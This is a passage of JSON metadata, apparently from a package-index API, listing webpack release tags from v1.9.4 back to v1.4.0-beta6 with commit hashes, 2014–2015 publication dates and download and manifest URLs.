.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1